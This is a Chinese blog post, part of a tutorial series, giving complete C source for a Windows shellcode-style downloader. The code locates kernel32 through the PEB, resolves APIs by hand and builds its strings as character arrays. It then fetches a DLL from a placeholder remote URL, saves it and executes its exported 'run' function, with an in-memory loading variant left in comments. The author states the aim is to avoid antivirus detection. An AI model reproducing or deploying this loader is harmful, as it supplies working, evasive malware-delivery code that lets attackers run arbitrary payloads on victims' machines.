C语言实现shellcode通用框架二:文件下载执行或内存加载

最新推荐文章于 2024-07-02 10:08:41 发布
最新推荐文章于 2024-07-02 10:08:41 发布
阅读量1.1k 收藏 2
点赞数
分类专栏: C/C++ Windows黑客基础编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yan_star/article/details/112974855
版权
该博客介绍了如何使用C语言编写shellcode,通过动态加载远程DLL来实现代码的更新。文中详细展示了如何获取API地址,如`LoadLibraryA`、`GetProcAddress`等,并利用这些API下载并保存远程文件到本地,最后加载执行。示例代码中涉及了网络通信和文件操作,旨在提供一种避免杀软检测的方法。
摘要由CSDN通过智能技术生成

简介:

承接接上篇。上篇(C语言实现shellcode通用框架一:解密执行)我们的第二层shellcode核心代码都是事先加密好嵌套在第一层shellcode中,核心代码更新起来不方便。所以联网更新显得尤为重要。大家可以选择内存加载,这样可以避免落地被杀软查杀,也可以选择落地,随意选择,思想和代码很重要。其实,这篇介绍的shellcode框架代码和上篇大同小异,无非是API、动态库多了一些,代码量有所变大,但是核心思想,代码逻辑还是一样的。开下源,希望对大家学习有所帮助。关于内存加载那块我注释并标出了,使用的是git上一个很好的开源项目MemoryModule(传送门)。下面一起看代码吧!

#include <Windows.h>
#include <stdio.h>
#include <Wininet.h>
//#include "MemoryModule.h"

//__declspec(naked) DWORD getKernel32()
//{
//	__asm
//	{
//		mov eax, fs:[0x30] 
//		mov eax, [eax + 0xc]     
//		mov eax, [eax + 0x14]    
//		mov eax, [eax]
//		mov eax, [eax]
//		mov eax, [eax + 0x10]
//		ret
//	}
//}

FARPROC	_GetProcAddresss(HMODULE hMoudleBase);

int main()
{
	HMODULE h_kernel32 = NULL;
	__asm
	{
		mov eax, fs:[0x30] 
		mov eax, [eax + 0xc]     
		mov eax, [eax + 0x14]    
		mov eax, [eax]
		mov eax, [eax]
		mov eax, [eax + 0x10]
		mov h_kernel32, eax
	}
	//printf("kernel32: 0x%08x\n",h_kernel32);
	//printf("kernel32: 0x%08x\n",LoadLibraryA("kernel32.dll"));
	typedef FARPROC (WINAPI *FN_GetProcAddress) (
		__in HMODULE hModule,
		__in LPCSTR lpProcName
		);
	
	FN_GetProcAddress fn_GetProcAddress;
	fn_GetProcAddress = (FN_GetProcAddress)_GetProcAddresss(h_kernel32);
	
	typedef HMODULE (WINAPI *FN_LoadLibrary)(
		__in LPCSTR lpLibFileName
		);
	
	FN_LoadLibrary fn_LoadLibrary;
	char strLoadLibraryA[] = {'L','o','a','d','L','i','b','r','a','r','y','A','\x00'};
	fn_LoadLibrary = (FN_LoadLibrary)fn_GetProcAddress(h_kernel32,strLoadLibraryA);
	//printf("LoadLibrary: 0x%08x\n",fn_LoadLibrary);
	//printf("LoadLibrary: 0x%08x\n",LoadLibraryA);

	char struser32[] = {'u','s','e','r','3','2','.','d','l','l','\x00'};
	HMODULE h_user32 = fn_LoadLibrary(struser32);
	//printf("user32: 0x%08x\n",h_user32);
	//printf("user32: 0x%08x\n",LoadLibraryA("user32.dll"));

	//printf("GetProcAddress: 0x%08x\n",fn_GetProcAddress);
	//printf("GetProcAddress: 0x%08x\n",GetProcAddress);
	
	char strwininet[] = {'w','i','n','i','n','e','t','.','d','l','l','\x00'};
	HMODULE h_winnet = fn_LoadLibrary(strwininet);
	//printf("wininet: 0x%08x\n", h_winnet);
	//printf("wininet: 0x%08x\n", LoadLibraryA("wininet.dll"));

	typedef HINTERNET(WINAPI *FN_InternetOpenA)(
		_In_opt_ LPCSTR lpszAgent,
		_In_ DWORD dwAccessType,
		_In_opt_ LPCSTR lpszProxy,
		_In_opt_ LPCSTR lpszProxyBypass,
		_In_ DWORD dwFlags
		);
	char strInternetOpenA[] = {'I','n','t','e','r','n','e','t','O','p','e','n','A','\x00'};
	FN_InternetOpenA fn_InternetOpenA = (FN_InternetOpenA)fn_GetProcAddress(h_winnet, strInternetOpenA);

	typedef HINTERNET(WINAPI *FN_InternetOpenUrlA)(
		__in HINTERNET hInternet,
		__in LPCSTR lpszUrl,
		__in_ecount_opt(dwHeadersLength) LPCSTR lpszHeaders,
		__in DWORD dwHeadersLength,
		__in DWORD dwFlags,
		__in_opt DWORD_PTR dwContext
		);

	char strInternetOpenUrlA[] = {'I','n','t','e','r','n','e','t','O','p','e','n','U','r','l','A','\x00'};
	FN_InternetOpenUrlA fn_InternetOpenUrlA = (FN_InternetOpenUrlA)fn_GetProcAddress(h_winnet, strInternetOpenUrlA);

	typedef HANDLE (WINAPI *FN_CreateFileA)(
		_In_ LPCSTR lpFileName,
		_In_ DWORD dwDesiredAccess,
		_In_ DWORD dwShareMode,
		_In_opt_ LPSECURITY_ATTRIBUTES lpSecurityAttributes,
		_In_ DWORD dwCreationDisposition,
		_In_ DWORD dwFlagsAndAttributes,
		_In_opt_ HANDLE hTemplateFile
		);
	
	char strCreateFileA[] = {'C','r','e','a','t','e','F','i','l','e','A','\x00'};
	FN_CreateFileA fn_CreateFileA = (FN_CreateFileA)fn_GetProcAddress(h_kernel32, strCreateFileA);

	typedef BOOL (WINAPI *FN_WriteFile)(
		__in        HANDLE hFile,
		__in_bcount_opt(nNumberOfBytesToWrite) LPCVOID lpBuffer,
		__in        DWORD nNumberOfBytesToWrite,
		__out_opt   LPDWORD lpNumberOfBytesWritten,
		__inout_opt LPOVERLAPPED lpOverlapped
		);
	
	char strWriteFile[] = {'W','r','i','t','e','F','i','l','e','\x00'};
	FN_WriteFile fn_WriteFile = (FN_WriteFile)fn_GetProcAddress(h_kernel32, strWriteFile);
	
	typedef BOOL(WINAPI* FN_CloseHandle)(
		__in HANDLE hObject
		);
	

	char strCloseHandle[] = {'C','l','o','s','e','H','a','n','d','l','e','\x00'};
	FN_CloseHandle fn_CloseHandle = (FN_CloseHandle)fn_GetProcAddress(h_kernel32, strCloseHandle);
	
	char strmsvcrt[] = {'m','s','v','c','r','t','.','d','l','l','\x00'};
	HMODULE h_msvcrt = fn_LoadLibrary(strmsvcrt);


	//typedef LPVOID (WINAPI* FN_VirtualAlloc)(
	//	__in_opt LPVOID lpAddress,
	//	__in     SIZE_T dwSize,
	//	__in     DWORD flAllocationType,
	//	__in     DWORD flProtect
	//	);

	//char strVirtualAlloc[] = {'V','i','r','t','u','a','l','A','l','l','o','c','\x00'};
	//FN_VirtualAlloc fn_VirtualAlloc = (FN_VirtualAlloc)fn_GetProcAddress(h_kernel32, strVirtualAlloc);

	typedef void* (*FN_malloc)(_In_ size_t _Size);
	char stmalloc[] = {'m','a','l','l','o','c','\x00'};
	FN_malloc fn_malloc = (FN_malloc)fn_GetProcAddress(h_msvcrt, stmalloc);
	
	typedef void (*FN_memset)(_Out_opt_bytecapcount_(_Size) void * _Dst, _In_ int _Val, _In_ size_t _Size);
	char strmemset[] = {'m','e','m','s','e','t','\x00'};
	FN_memset fn_memset = (FN_memset)fn_GetProcAddress(h_msvcrt, strmemset);

	typedef void (*FN_free)(_Inout_opt_ void * _Memory);
	char strfree[] = {'f','r','e','e','\x00'};
	FN_free fn_free = (FN_free)fn_GetProcAddress(h_msvcrt, strfree);

	typedef BOOL (WINAPI* FN_InternetReadFile)(
		__in HINTERNET hFile,
		__out_bcount(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,
		__in DWORD dwNumberOfBytesToRead,
		__out LPDWORD lpdwNumberOfBytesRead
		);

	char strInternetReadFile[] = {'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e','\x00'};
	FN_InternetReadFile fn_InternetReadFile = (FN_InternetReadFile)fn_GetProcAddress(h_winnet, strInternetReadFile);

	typedef BOOL(WINAPI* FN_InternetCloseHandle)(
		_In_ HINTERNET hInternet
		);
	
	char strInternetCloseHandle[] = {'I','n','t','e','r','n','e','t','C','l','o','s','e','H','a','n','d','l','e','\x00'};
	FN_InternetCloseHandle fn_InternetCloseHandle = (FN_InternetCloseHandle)fn_GetProcAddress(h_winnet, strInternetCloseHandle);
	
	char strIe[] = {'R','o','o','k','I','E','/','1','.','0','\x00'};
	HINTERNET hSession = fn_InternetOpenA(strIe, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
	
	//char strdllpath[] = {'C',':','\\','U','s','e','r','s','\\','P','u','b','l','i','c','\\','t','e','s','t','_','1','.','d','l','l','\x00'};
	char strdllpath[] = {'t','e','s','t','_','1','.','d','l','l','\x00'};
	if (hSession != NULL)
	{
		// down file url
		char strUrl[] = {'h','t','t','p',':','/','/','w','w','w','.','x','x','x','x','x','x','x','x','.','c','o','m','/','t','e','s','t','.','d','l','l','\x00'};
		HINTERNET hOpenUrl = fn_InternetOpenUrlA(hSession, strUrl, NULL, 0, INTERNET_FLAG_DONT_CACHE, 0);
		if (hOpenUrl != NULL)
		{
			//byte temp[0x65000];
			
			BYTE *temp = (BYTE*)fn_malloc(0x10000);
			fn_memset(temp,0,0x10000);
			DWORD num = 1;
			DWORD w_num = 0;
			
			HANDLE h_file = fn_CreateFileA(strdllpath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
			if (h_file)
			{
				fn_InternetReadFile(hOpenUrl, temp, 0x10000, &num);
				
				// memory load dll
				
				//size_t size_data = (size_t)num;
				//typedef void *HMEMORYMODULE;
				//HMEMORYMODULE h_dll = MemoryLoadLibrary(temp,size_data);
				
				//FARPROC run_api = MemoryGetProcAddress(h_dll,strRun);
				//run_api();
				//
				//MemoryFreeLibrary(h_dll);

				fn_WriteFile(h_file, temp, num, &w_num, NULL);
			}
			//printf("success\n");
			fn_CloseHandle(h_file);
			fn_free(temp);
			fn_InternetCloseHandle(hOpenUrl);
			hOpenUrl = NULL;
		}
		fn_InternetCloseHandle(hSession);
		hSession = NULL;
	}

	HMODULE h_dll = fn_LoadLibrary(strdllpath);
	typedef void (*FN_run)();
	char strRun[] = {'r','u','n','\x00'};
	FN_run fn_run = (FN_run)fn_GetProcAddress(h_dll,strRun);
	fn_run();
	//getchar();
	return 0;
}

FARPROC	_GetProcAddresss(HMODULE hMoudleBase)
{
	PIMAGE_DOS_HEADER lpDosHeader= (PIMAGE_DOS_HEADER)hMoudleBase;
	PIMAGE_NT_HEADERS32 lpNtHeadr = (PIMAGE_NT_HEADERS32)((DWORD)hMoudleBase + lpDosHeader->e_lfanew);
	if(!lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size)
		return NULL;
	if(!lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress)
		return NULL;

	PIMAGE_EXPORT_DIRECTORY lpExports = (PIMAGE_EXPORT_DIRECTORY)(((DWORD)hMoudleBase + (DWORD)lpNtHeadr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress));
	PDWORD lpdwFunName = (PDWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfNames);
	PWORD lpdwOrd = (PWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfNameOrdinals);
	PDWORD lpdwFunAddr = (PDWORD)((DWORD)hMoudleBase + (DWORD)lpExports->AddressOfFunctions);

	DWORD dwLoop = 0;
	FARPROC pRet = NULL;
	for(; dwLoop <= lpExports->NumberOfNames -1; dwLoop++)
	{
		char *pFunName = (char*)lpdwFunName[dwLoop] + (DWORD)hMoudleBase;
		if(pFunName[0] == 'G'  &&
			pFunName[1] == 'e'  &&
			pFunName[2] == 't'  &&
			pFunName[3] == 'P'  &&
			pFunName[4] == 'r'  &&
			pFunName[5] == 'o'  &&
			pFunName[6] == 'c'  &&
			pFunName[7] == 'A'  &&
			pFunName[8] == 'd'  &&
			pFunName[9] == 'd'  &&
			pFunName[10] == 'r' &&
			pFunName[11] == 'e' &&
			pFunName[12] == 's' &&
			pFunName[13] == 's' )
		{
			pRet = (FARPROC)(lpdwFunAddr[lpdwOrd[dwLoop]] + (DWORD)hMoudleBase);
			break;
		}
	}
	return pRet;
}

沭阳
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第16节 实战:文件shellcode
imbyter师哥的博客
05-14 1582
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。
RmExecute:Shellcode框架的远程下载和内存执行
04-08
远程下载并内存加载ShellCode框架,已经支持x64 参(抄)考(袭)项目 主要抄袭来源,直接使用这位大佬的shellcode框架,并且强烈推荐看下他文章内的doc,分析的非常好 windows api hashing部分直接搬过来的 准备...
C/C++ 实现ShellCode编写与提取
CSDN
07-16 9816
简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。使用 Release 模式写代码,这是因为 Debug 模式下的代码换成汇编后首先都是一个 jmp,然后再跳到我们的功能代码处,但 jmp 指令是 “地址相关” 的 ,所以在换成 shellcode 时就会出错!简单来说,shell code 的核心就是把代码写成 “与地址无关” 的风格,让它不论是在什么环境下都可以被执行。这就是我们需要的 ShellCode 了 (o゚v゚)ノ。
强对抗的 SquidLoader 针对中国企业发起攻击
最新发布
FreeBuf_的博客
07-02 597
研究人员近期发现了一种高对抗强度的 Loader,其通过钓鱼邮件附件传递给受害者。根据恶意软件所具备的引诱和规避行为,研究人员将其命名为 SquidLoader。SquidLoader 最早在 2024 年 4 月下旬被发现,但研究人员认为其至少已经活跃了一个月以上。SquidLoader 后续投递的是 Cobalt Strike,也都经过加强以对抗静态分析。根据 SquidLoader 的配置信息,研究人员发现过去两年中主要在针对讲中文的受害者进行攻击。
【Python】exe2shellcodeshellcode2exe
17bdw的编程备份笔记
12-04 28
用python写这类程序真简洁,要是用C++又不知道得多写多少行代码了。 exe2shellcode #! /usr/bin/env python # -*- coding: utf-8 -*- import os import sys def payload(files): shellcode = "" ctr = 1 maxlen = 15 #to create ...
Shellcode 2 EXE
08-23 1062
Shellcode在线换工具http://www.cha88.cn/safe/shellcode_2_exe.php换的时候会自动义以下代码 PHP代码 $shellcode = str_replace("/n", "", $shellcode);    $shellcode = str_replace("/r", "", $shellcode);
手动制作shellcode
fanghuapyk的博客
03-19 601
概括: 我们要将自己生成的shellcode汇编文件,编译为.o文件,然后再编译为可执行文件,然后将可执行文件中的有用的代码段单独复制出来,最后我们利用python脚本将我们的这一个文件发送到测试的程序中去 一:准备shellcode文件 1将汇编代码文件shellcode_32.Asm中代码编译为shellcode_32.o文件 命令为:nasm -f elf32 -o shellcode_32.o shellcode_32.asm push 0x68 push 0x732f2f2f push 0x6e6
基于C++的shellcode及植入目标程序设计 课程报告+代码exe执行文件
毕业作品网站
05-15 594
目录 一.程序模块划分 1 .主要模块描述 1 2.1 Shellcode 的生成 1 2.2 infect.cpp 简介 5 SetBytes 用于向文件指定位置覆盖写入 5 GetBytes 用于读取文件指定位置内容 5 获得 Dos 头中的 e_lfanew,即 PE 头的 RVA 6 三.传染模块的设计与实现 6 验证 PE 文件 8 2.获取 PE 头位置 9 四.PE 文件格式简述 10 Dos 头 10 PE header 11 SECTION TABLE 节
shellcoder:从可执行文件或汇编代码创建shellcode
02-05
一旦漏洞触发,shellcode就会被执行,从而实现攻击者的意图,例如提升权限、下载额外的恶意软件或执行其他有害操作。 4. **Perl在shellcode中的作用** Perl是一种强大的脚本语言,可以方便地处理字符串和进制...
Shellcode-Extractor:Python脚本从Linux可执行文件中提取Shellcode
05-18
ShellcodeExtractor SHELLCODE-EXTRACTOR工具,用于从对象/进制文件中提取shellcode和长度。 版权所有(C)2017 Neetx 该文件是Shellcode-Extractor的一部分。 Shellcode-Extractor是免费软件:您可以根据自由软件...
基于Java实现Shellcode加载器源码+项目说明.zip
12-29
基于Java实现Shellcode加载器源码+项目说明.zip基于Java实现Shellcode加载器源码+项目说明.zip基于Java实现Shellcode加载器源码+项目说明.zip基于Java实现Shellcode加载器源码+项目说明.zip
第六十八课:基于Ruby内存加载shellcode第一季1
08-03
基于Ruby内存加载shellcode第一季 本资源是一个关于APT攻击与防御的教程,专门介绍基于Ruby内存加载shellcode的技术。该教程着重于msf无文件渗透的基础过渡,并为msf插件编写做基础过渡。 Ruby shellcode 生成 ...
开源一个ShellCode生成框架
鬼手的博客
05-25 2766
文章目录前言项目预览项目配置文件命名与作用ShellCode大小的计算方法第一部分 ShellCode生成第部分 ShellCode部分ShellCode加载器如何提取ShellCode如何扩展ShellCode框架?参考资料项目下载 前言 现阶段,shellcode编写门槛高,大多需要有较深的汇编功底,而Metersploit上的Shellcode开源生成框架,功能单一,扩展性差,大多只能在d...
1.8 运用C编写ShellCode代码
热门推荐
CSDN
08-30 1万+
在笔者前几篇文章中,我们使用汇编语言并通过自定位的方法实现了一个简单的`MessageBox`弹窗功能,但由于汇编语言过于繁琐在编写效率上不仅要考验开发者的底层功底,还需要写出更多的指令集,这对于普通人来说是非常困难的,当然除了通过汇编来实现`ShellCode`的编写以外,使用C同样可以实现编写,在多数情况下读者可以直接使用C开发,只有某些环境下对ShellCode条件有极为苛刻的长度限制时才会考虑使用汇编。
C/C++ 通用ShellCode的编写与调用
CSDN
09-23 1万+
首先,我们的ShellCode代码需要自定位,因为我们的代码并不是一个完整的EXE执行程序,他没有导入表无法定位到当前系统中每个函数的虚拟地址,所以我们直接获取到Kernel32.dll的基地址,里面的GetProcAddr这个函数,获取的方式有很多,第一种是暴力搜索,第种通过遍历进程的TEB结构来实现,我们使用第种方式尝试,一旦获取到该函数,就可以动态的调用任何想要的函数了。
免杀之浅谈shellcode加载
qq_46217803的博客
12-26 1763
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
c++之shellcode加载
qq_44657899的博客
05-26 3532
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
无dll插入进程,下载者vc源代码
u010488395的专栏
05-06 678
无dll插入进程,下载者vc源代码 增加代码xor解密功能,以逃过杀毒软件. 生成mini下载者,则需要自己做一个工具了.读懂代码,把相应的部份加密即可. 参考delphi版本的下载者源代码,编出来有16k左右。压缩也有10k多, 于是写了vc的代码。按以下的设置,编译出来2k左右。 还可以可以再设置一下编译开关,以减小体积。 ps:原代码中4处没有对\义,以下代码编译通过; 编译
使用C语言编写通用shellcode的程序
TYJJXSJ的专栏
01-29 2140
/*   使用C语言编写通用shellcode的程序   出处:internet   修改:Hume/冷雨飘心   测试:Win2K SP4 Local   */    #include    #include    #include    #define  DEBUG 1    //    //函数原型    //    void    
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值